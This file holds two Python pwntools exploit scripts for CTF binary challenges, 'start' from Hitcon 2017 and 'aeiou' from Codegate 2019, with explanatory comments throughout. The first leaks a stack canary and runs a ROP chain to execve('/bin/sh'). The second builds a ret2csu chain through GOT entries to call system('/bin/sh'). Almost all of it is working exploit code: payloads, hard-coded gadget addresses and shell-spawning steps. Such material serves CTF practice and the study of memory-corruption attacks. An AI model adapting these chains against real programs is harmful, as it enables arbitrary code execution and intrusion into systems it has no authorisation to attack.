
exploit.py


from pwn import *


# Exploit for the Hitcon CTF 2017 "start" pwnable (see ./start): a stack
# canary leak followed by a ROP chain. It depends on two properties of the
# target: the canary's upper bytes can be read back through the program's
# own output, and every gadget sits at a fixed, hard-coded address.
# Written for Python 2 pwntools (str payloads, print statements); under
# Python 3 every payload would have to be bytes.
p = process("./start")


# Only e.bss() is taken from the ELF below.
e = ELF("./start")


# First write: 0x20-12 = 20 filler bytes plus 4 marker bytes. The write
# stops just short of the stack canary so that the program's next output
# includes the canary's upper bytes (reconstructed below).
payload = "A"*(0x20-12)

payload += "B"*4


p.sendline(payload)

print p.recvuntil("\n")

# The canary's low byte is taken to be 0x00 and the remaining seven bytes
# are read from the program's output; together they are the 8-byte value
# that the second write must put back in its slot.
canary = "\x00" + p.recv(7)

print p.recv()

sleep(0.2)

# Gadget addresses hard-coded for this specific challenge binary; they are
# used verbatim, i.e. the binary is assumed to load at a fixed base, and
# they mean nothing for any other build.
pop_rax_rdx_rbx = 0x47a6e6

pop_rdi = 0x4005d5

pop_rsi = 0x4017f7

pop_rdx = 0x443776

syscall = 0x4003fc

# The string that stage 1 of the chain stores in .bss and stage 2 passes
# to execve; sent last (see the p.send at the bottom).
binsh = "/bin/sh\x00"


# Address of read() inside the binary itself (hard-coded; presumably a
# statically linked build -- confirm against the ELF).
read = 0x440300


# Second write: 0x20-8 = 24 filler bytes, the canary back in its slot,
# 8 bytes over the next saved word (presumably the saved rbp -- confirm),
# and then the return address is replaced by the chain.
payload2 = "A"*(0x20-8)

payload2 += canary

payload2 += "C"*8


# Chain stage 1: rdi=0, rsi=e.bss(), rdx=len(binsh)=8, then read(), i.e.
# read(0, bss, 8) -- copies the 8 bytes sent later into .bss.
payload2 += p64(pop_rdi)

payload2 += p64(0)

payload2 += p64(pop_rsi)

payload2 += p64(e.bss())

payload2 += p64(pop_rdx)

payload2 += p64(len(binsh))

payload2 += p64(read)


# Chain stage 2: rax=59 (execve on x86-64 Linux), rdx=0, rbx=0 (rbx is only
# a by-product of the three-register gadget), rsi=0, rdi=bss, then the
# syscall gadget -> execve(bss, NULL, NULL).
payload2 += p64(pop_rax_rdx_rbx)

payload2 += p64(59)

payload2 += p64(0)

payload2 += p64(0)

payload2 += p64(pop_rsi)

payload2 += p64(0)

payload2 += p64(pop_rdi)

payload2 += p64(e.bss())

payload2 += p64(syscall)



p.sendline(payload2)


print p.recv()

sleep(0.2)

# "exit" is sent before the chain runs; presumably it ends the program's
# input loop so that the overwritten return address is actually used --
# confirm against the binary. The final send is what stage 1's read()
# stores in .bss.
p.sendline("exit")

p.send(binsh)

p.interactive()


exploit.py

from pwn import *
  
# Exploit for the Codegate 2019 CTF "aeiou" pwnable (see ./aeiou): a ret2csu
# chain built from hard-coded __libc_csu_init gadget addresses and the GOT
# entries of the target. Python 2 pwntools idioms (str payloads) throughout.
p = process("./aeiou")

# e.got[...] and e.bss() are used to build the chain below.
e = ELF("./aeiou")
# NOTE(review): l is never used in this script.
l = e.libc


def csu_chain(addr,argv1,argv2,argv3,mode=1):
    """Build one __libc_csu_init call frame as a str.

    Lays out, in stack order, the six words popped by the csu gadget (the
    usual rbx=0 / rbp=1 pair, then ``addr`` and the three arguments),
    followed by ``csu_2`` (module-level constant) so that the next ret lands
    on the register-loading/call half of the gadget. ``addr`` is the address
    *of a pointer* to the function to call (a GOT entry in this script), not
    the function itself. Which of argv1..argv3 lands in which register is
    decided by the exact gadget in this binary -- confirm against the
    disassembly. ``mode`` != 0 prepends 8 filler bytes, presumably to skip
    the stack slot the call half of the gadget leaves behind; it is 0 only
    for the very first frame that directly follows the pop half.
    """
    # Words in the order the pop gadget consumes them; the last one is the
    # address the trailing ret jumps to.
    words = (0, 1, addr, argv3, argv2, argv1, csu_2)
    frame = "".join(p64(w) for w in words)
    if mode == 0:
        return frame
    return "A"*8 + frame

# Stored in .bss by chain 1 and handed to system() by chain 2.
binsh = "/bin/sh\x00"
# __libc_csu_init gadget addresses, hard-coded for this challenge binary
# (assumed fixed base): csu_1 is presumably the pop-register half and csu_2
# the half that loads the argument registers and calls through r12 --
# confirm against the disassembly. Meaningless for any other build.
csu_1 = 0x4026EA
csu_2 = 0x4026D0
# A lone `ret` gadget, presumably for stack alignment ahead of the chain --
# confirm.
ret = 0x400b29

# 0x1018 = 4120 filler bytes up to the saved return address.
payload = "A"*0x1018
payload += p64(ret)
payload += p64(csu_1)
# Chain 1: read(0, bss, len(binsh)) through the GOT entry of read; mode=0
# because this frame directly follows csu_1, so no slot has to be skipped.
payload += csu_chain(e.got['read'],0,e.bss(),len(binsh),0)
# Chain 2: system(bss) through the GOT entry of system; the default mode
# prepends the 8 filler bytes.
payload += csu_chain(e.got['system'],e.bss(),0,0)
# NOTE(review): despite its name this is plain padding up to a total of
# 6224 bytes -- the byte count the program is told to read below -- and
# has nothing to do with a stack canary.
canary = "A"*(6224-len(payload))
payload += canary

# Menu interaction: option 3, then the byte count, then the payload itself.
p.sendlineafter(">>","3")
p.sendlineafter("number!\n",str(len(payload)))
p.sendline(payload)
# Consumed by chain 1's read() into .bss.
p.sendline(binsh)
p.interactive()
